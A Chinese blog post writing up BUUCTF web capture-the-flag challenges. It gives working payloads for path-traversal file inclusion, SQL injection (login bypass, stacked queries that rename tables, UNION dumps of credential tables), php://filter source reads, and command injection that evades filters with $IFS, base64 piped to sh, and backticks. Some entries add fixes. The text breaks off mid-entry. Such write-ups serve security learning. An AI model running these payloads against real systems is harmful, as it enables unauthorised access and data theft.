<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      BUU_WEB刷题_0x01-0x0F 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        BUU_WEB刷题_0x01-0x0F
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2021-04-17
      </span>

                                                                        <span class="post-pubtime"> 本文共2.2k字 </span>

                                                                        <span class="post-pubtime">
        大约需要15min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/WEB/" title="WEB">
            <b>#</b> WEB
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>[TOC]</p>
<h2 id="0x1-HCTF-2018-WarmUp"><a href="#0x1-HCTF-2018-WarmUp" class="headerlink" title="0x1.[HCTF 2018]WarmUp"></a>0x1.[HCTF 2018]WarmUp</h2><p>代码审计+文件包含</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span 
class="title">emmm</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params">&amp;<span class="variable">$page</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable">$whitelist</span> = [<span class="string">&quot;source&quot;</span>=&gt;<span class="string">&quot;source.php&quot;</span>,<span class="string">&quot;hint&quot;</span>=&gt;<span class="string">&quot;hint.php&quot;</span>];</span><br><span class="line">            <span class="keyword">if</span> (! <span class="keyword">isset</span>(<span class="variable">$page</span>) || !is_string(<span class="variable">$page</span>)) &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos(<span class="variable">$page</span> . 
<span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line"><span class="comment">/*这里mb_sustr 是个截断，返回0到mb_strpos之间的内容，而mb_strps 则是查找第一次出现的位置，</span></span><br><span class="line"><span class="comment">所以基本可以理解为获取page 两个？之间的字符串，也就是获取file两个？之间的字符串，放到url中就是http://ip/?file=ddd?中的file=ddd*/</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$_page</span> = urldecode(<span class="variable">$page</span>);</span><br><span class="line">            <span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$_page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos(<span class="variable">$_page</span> . 
<span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (! <span class="keyword">empty</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; is_string(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; emmm::checkFile(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">    ) &#123;</span><br><span class="line">        <span class="keyword">include</span> <span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;</span><br><span class="line">    &#125;  </span><br><span class="line"><span 
class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>?file=source.php?/../../../../ffffllllaaaagggg</code></p>
<p>或</p>
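<p><code>?file=hint.php?/../../../../ffffllllaaaagggg</code></p>
<p>原因：checkFile只校验<code>$page</code>中第一个?之前的部分是否在白名单里，而include用的却是完整的<code>$_REQUEST[&#39;file&#39;]</code>，校验的内容和实际使用的内容不一致。修复时应当只include白名单里的固定值，而不是原始输入。</p>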
<h2 id="0x2-极客大挑战-2019-EasySQL"><a href="#0x2-极客大挑战-2019-EasySQL" class="headerlink" title="0x2.[极客大挑战 2019]EasySQL"></a>0x2.[极客大挑战 2019]EasySQL</h2><p>直接</p>
<p><code>payload: username=admin&#39; or &#39;1&#39;=&#39;1&amp;password=aaa&#39; or &#39;1&#39;=&#39;1</code></p>
<p><code>username=admin&amp;password=aa&#39; or &#39;1&#39;=&#39;1</code></p>
<h2 id="0x3-强网杯-2019-随便注"><a href="#0x3-强网杯-2019-随便注" class="headerlink" title="0x3.[强网杯 2019]随便注"></a>0x3.[强网杯 2019]随便注</h2><p>用union select 时：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return preg_match(&quot;/select|update|delete|drop|insert|where|\./i&quot;,$inject);</span><br></pre></td></tr></table></figure>

<h3 id="1）-堆叠注入："><a href="#1）-堆叠注入：" class="headerlink" title="1）.堆叠注入："></a>1）.堆叠注入：</h3><p>show databases;</p>
<p>show tables;</p>
<p>查看表结构：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">desc `1919810931114514`--+</span><br><span class="line">注意要用`引起来</span><br><span class="line">或：show columns from `1919810931114514`</span><br></pre></td></tr></table></figure>

<p>可以知道，有两个表，words，1919810931114514(这里面有flag)。</p>
<p>大致查询语句应该为：select id,data from words where id&#x3D;;</p>
<p>那么可以将words表改名为word1，将1919810931114514表改名为words，再给新的words表加上id列，并把flag列改名为data，这样原来的查询语句读出来的就是flag。（偷天换日的感觉）</p>
<blockquote>
<p> 1&#39;; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">修改已知表的列：</span><br><span class="line"></span><br><span class="line">添加一个列</span><br><span class="line">alter table &quot;table_name&quot; add &quot; column_name&quot;  type;</span><br><span class="line"></span><br><span class="line">删除一个列</span><br><span class="line">alter table &quot;table_name&quot; drop &quot; column_name&quot;  type;</span><br><span class="line"></span><br><span class="line">改变列的数据类型</span><br><span class="line">alter table &quot;table_name&quot; alter column &quot; column_name&quot; type;</span><br><span class="line"></span><br><span class="line">改列名</span><br><span class="line">alter table &quot;table_name&quot; change &quot; column1&quot; &quot; column2&quot; type;</span><br><span class="line">alter table &quot;table_name&quot; rename &quot;column1&quot; to &quot;column2&quot;;</span><br></pre></td></tr></table></figure>




<h2 id="0x4-极客大挑战-2019-Havefun"><a href="#0x4-极客大挑战-2019-Havefun" class="headerlink" title="0x4.[极客大挑战 2019]Havefun"></a>0x4.[极客大挑战 2019]Havefun</h2><p>看源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$cat</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;cat&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$cat</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$cat</span>==<span class="string">&#x27;dog&#x27;</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;Syc&#123;cat_cat_cat_cat&#125;&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>直接出flag</p>
<h2 id="0x5-SUCTF-2019-EasySQL"><a href="#0x5-SUCTF-2019-EasySQL" class="headerlink" title="0x5.[SUCTF 2019]EasySQL"></a>0x5.[SUCTF 2019]EasySQL</h2><p>还是堆叠注入</p>
<p>show databases;和show tables后就不知道干啥了。。</p>
<p>比较坑，没有提示</p>
<p>后来看了wp，查询语句是：select $_post[query] || flag from flag</p>
<h3 id="1）正解"><a href="#1）正解" class="headerlink" title="1）正解"></a>1）正解</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>;<span class="keyword">set</span> sql_mode<span class="operator">=</span>pipes_as_concat;<span class="keyword">select</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>即：select 1;set sql_mode&#x3D;pipes_as_concat;select 1 || flag from flag</p>
<p><strong>补充</strong>：</p>
<p>系统变量@@sql_mode：是一组mysql支持的基本语法及校验规则<br>PIPES_AS_CONCAT：将“||”视为字符串的连接操作符而非或运算符，这和Oracle数据库是一样的，也和字符串的拼接函数Concat相类似</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42373127/article/details/88866710">Mysql中sql_mode参数</a></p>
<h3 id="2）非预期解"><a href="#2）非预期解" class="headerlink" title="2）非预期解"></a>2）非预期解</h3><p>构造：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select *,1 || flag from flag</span><br></pre></td></tr></table></figure>

<h2 id="0x6-ACTF2020-新生赛-Include"><a href="#0x6-ACTF2020-新生赛-Include" class="headerlink" title="0x6.[ACTF2020 新生赛]Include"></a>0x6.[ACTF2020 新生赛]Include</h2><p>使用php:&#x2F;&#x2F;input 伪协议+POST发送php代码，不行</p>
<p>使用php:&#x2F;&#x2F;filter伪协议进行包含</p>
<p>于是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<p>php:&#x2F;&#x2F;filter与包含函数结合时，php:&#x2F;&#x2F;filter流会被当作php文件执行。所以我们一般先对其进行编码，使其不被执行，这样就能读到文件源码，从而导致任意文件读取。</p>
<p>php:&#x2F;&#x2F;filter 伪协议文件包含读取源代码，加上read&#x3D;convert.base64-encode，用base64编码输出，不然会直接当做php代码执行，看不到源代码内容。</p>
<h2 id="0x7-极客大挑战-2019-Secret-File"><a href="#0x7-极客大挑战-2019-Secret-File" class="headerlink" title="0x7.[极客大挑战 2019]Secret File"></a>0x7.[极客大挑战 2019]Secret File</h2><p>有个action.php的文件，之后抓包访问，有个secr3t.php文件，访问：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    error_reporting(<span class="number">0</span>);</span><br><span class="line">    <span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(strstr(<span class="variable">$file</span>,<span class="string">&quot;../&quot;</span>)||stristr(<span class="variable">$file</span>, <span class="string">&quot;tp&quot;</span>)||stristr(<span class="variable">$file</span>,<span class="string">&quot;input&quot;</span>)||stristr(<span class="variable">$file</span>,<span class="string">&quot;data&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Oh no!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$file</span>); </span><br><span class="line"><span class="comment">//flag放在了flag.php里</span></span><br></pre></td></tr></table></figure>

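<p>可以和上一题一样，用php:&#x2F;&#x2F;filter。源码里的黑名单只拦了<code>../</code>、<code>tp</code>、<code>input</code>、<code>data</code>，没有拦php:&#x2F;&#x2F;filter，可见靠黑名单过滤关键字并不可靠，应当改为只包含白名单中的固定文件。</p>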
<p>payload: ?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</p>
<p>解码:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">    &lt;head&gt;</span><br><span class="line">        &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">        &lt;title&gt;FLAG&lt;/title&gt;</span><br><span class="line">    &lt;/head&gt;</span><br><span class="line"></span><br><span class="line">    &lt;body style=&quot;background-color:black;&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</span><br><span class="line">        </span><br><span class="line">        &lt;h1 style=&quot;font-family:verdana;color:red;text-align:center;&quot;&gt;啊哈！你找到我了！可是你看不到我QAQ~~~&lt;/h1&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</span><br><span class="line">        </span><br><span class="line">        &lt;p style=&quot;font-family:arial;color:red;font-size:20px;text-align:center;&quot;&gt;</span><br><span class="line">            &lt;?php</span><br><span class="line">                echo &quot;我就在这里&quot;;</span><br><span class="line">                $flag = &#x27;flag&#123;2c021ef6-68a2-4674-bf4d-ca928f144327&#125;&#x27;;</span><br><span class="line">                $secret = &#x27;jiAng_Luyuan_w4nts_a_g1rIfri3nd&#x27;</span><br><span 
class="line">            ?&gt;</span><br><span class="line">        &lt;/p&gt;</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="0x8-极客大挑战-2019-LoveSQL"><a href="#0x8-极客大挑战-2019-LoveSQL" class="headerlink" title="0x8.[极客大挑战 2019]LoveSQL"></a>0x8.[极客大挑战 2019]LoveSQL</h2><p>这里只能用%23，不能用#和--+（#在URL里是片段标识符，浏览器不会把它和后面的内容发给服务器，所以要写成URL编码后的%23；--+为什么不行没有确认）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">?username=admin&#x27;%23&amp;password=1</span><br><span class="line"></span><br><span class="line">?username=admin&#x27; order by 3%23&amp;password=1</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,2,3%23&amp;password=1</span><br><span class="line">是2和3</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,database(),3%23&amp;password=1</span><br><span class="line">数据库名：geek</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#x27;geek&#x27;%23&amp;password=1</span><br><span class="line">得到可疑表：l0ve1ysq1</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#x27;geek&#x27; and table_name=&#x27;l0ve1ysq1&#x27;%23&amp;password=1</span><br><span class="line">得到字段id,username,password</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,group_concat(id,username,password),3 from geek.l0ve1ysq1%23&amp;password=1</span><br><span class="line">或者：</span><br><span 
class="line">?username=111&#x27; union select id,username,password from geek.l0ve1ysq1 limit 0,1%23&amp;password=1</span><br><span class="line">一个一个查</span><br></pre></td></tr></table></figure>

<h2 id="0x9-ACTF2020-新生赛-Exec"><a href="#0x9-ACTF2020-新生赛-Exec" class="headerlink" title="0x9.[ACTF2020 新生赛]Exec"></a>0x9.[ACTF2020 新生赛]Exec</h2><p>就是连接命令，可以管道符||，也可以分号，或者&amp;这个符号。</p>
<p>但是经过测试，只有分号可以让多个命令一起执行（在这道题）</p>
<p><img src="/2021/04/17/BUU-WEB-0x1-0xF/image-20210415165001140.png" alt="image-20210415165001140"></p>
<p>找到flag.</p>
<h2 id="0xA-GXYCTF2019-Ping-Ping-Ping"><a href="#0xA-GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="0xA.[GXYCTF2019]Ping Ping Ping"></a>0xA.[GXYCTF2019]Ping Ping Ping</h2><p>打开后发现无论是cat flag.php还是index.php都打不开，经过测试发现可能是过滤了空格。</p>
<blockquote>
<ol>
<li>${IFS}替换</li>
<li>$IFS$1替换</li>
<li>${IFS替换</li>
<li>%20替换</li>
<li>&lt;和&lt;&gt;重定向符替换</li>
<li>%09替换</li>
</ol>
</blockquote>
<p>$IFS是shell中的一个变量（内部字段分隔符），默认值包含空格、制表符和换行符，所以展开后可以代替空格。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;ip&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$ip</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;ip&#x27;</span>];</span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;1f&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;</span>, <span class="variable">$ip</span>, <span class="variable">$match</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> preg_match(<span class="string">&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;20&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;</span>, <span class="variable">$ip</span>, <span class="variable">$match</span>);</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your symbol!&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&quot;/ /&quot;</span>, <span 
class="variable">$ip</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your space!&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&quot;/bash/&quot;</span>, <span class="variable">$ip</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your bash!&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&quot;/.*f.*l.*a.*g.*/&quot;</span>, <span class="variable">$ip</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your flag!&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="variable">$a</span> = shell_exec(<span class="string">&quot;ping -c 4 &quot;</span>.<span class="variable">$ip</span>);</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt;&quot;</span>;</span><br><span class="line">  print_r(<span class="variable">$a</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以看到确实过滤了很多东西</p>
<h3 id="1-拼接"><a href="#1-拼接" class="headerlink" title="1)拼接"></a>1)拼接</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=1;a=g;cat$IFS$1fla$a.php;</span><br></pre></td></tr></table></figure>

<h3 id="2-base64"><a href="#2-base64" class="headerlink" title="2)base64"></a>2)base64</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh</span><br></pre></td></tr></table></figure>

<p>其中Y2F0IGZsYWcucGhw是cat flag.php的base64编码，之后用base64 -d命令解码</p>
<h3 id="3-内敛绕过-NB"><a href="#3-内敛绕过-NB" class="headerlink" title="3)内联执行绕过(NB)"></a>3)内联执行绕过(NB)</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=111;cat$IFS$1`ls`</span><br></pre></td></tr></table></figure>

<p>也就是先执行反引号内的命令（这里是ls），再把它的输出作为外层命令（这里是cat）的参数。</p>
<h2 id="0xB-极客大挑战-2019-Knife"><a href="#0xB-极客大挑战-2019-Knife" class="headerlink" title="0xB.[极客大挑战 2019]Knife"></a>0xB.[极客大挑战 2019]Knife</h2><p>菜刀连一下就OK</p>
<h2 id="0xC-RoarCTF-2019-Easy-Calc"><a href="#0xC-RoarCTF-2019-Easy-Calc" class="headerlink" title="0xC.[RoarCTF 2019]Easy Calc"></a>0xC.[RoarCTF 2019]Easy Calc</h2><p>这题用到的知识点：<strong>PHP的字符串解析特性</strong></p>
<p><strong>可以先查看根目录下文件：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%20num=1;var_dump(scandir(chr(47)))</span><br></pre></td></tr></table></figure>

<p><img src="/2021/04/17/BUU-WEB-0x1-0xF/image-20210415181858484.png" alt="image-20210415181858484"></p>
<p>为什么要在num前加空格？</p>
<p>假如waf不允许num变量传递字母，可以在num前加个空格，这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把变量名开头的空格去掉，这样我们的代码还能正常运行，被过滤的字符也就传了进去。</p>
<p>如果发现过滤，可以用chr()把ASCII码转成字符之后再拼接。</p>
<p><strong>读取f1agg</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))</span><br></pre></td></tr></table></figure>

<p>之后得到flag</p>
<p><strong>PHP的字符串解析特性是什么？</strong></p>
<p>答： PHP需要将所有参数转换为有效的变量名，因此在<strong>解析查询字符串时</strong>，它会做两件事：</p>
<p>1.删除参数名开头的空白符</p>
<p>2.将某些字符转换为下划线（包括空格）</p>
<p>[当waf不让你过的时候，php却可以让你过]也就是说，WAF和PHP对参数名的解析不一致；防御时WAF应先按PHP的规则规范化参数名再做检查。</p>
<p>还有一种方法：</p>
<p><strong>HTTP走私攻击（HTTP数据接收不同步攻击）</strong></p>
<h2 id="0xD-极客大挑战-2019-Http"><a href="#0xD-极客大挑战-2019-Http" class="headerlink" title="0xD.[极客大挑战 2019]Http"></a>0xD.[极客大挑战 2019]Http</h2><p>找到Secret.php文件</p>
<p>说没有来自<code>https://www.Sycsecret.com</code>网站，加</p>
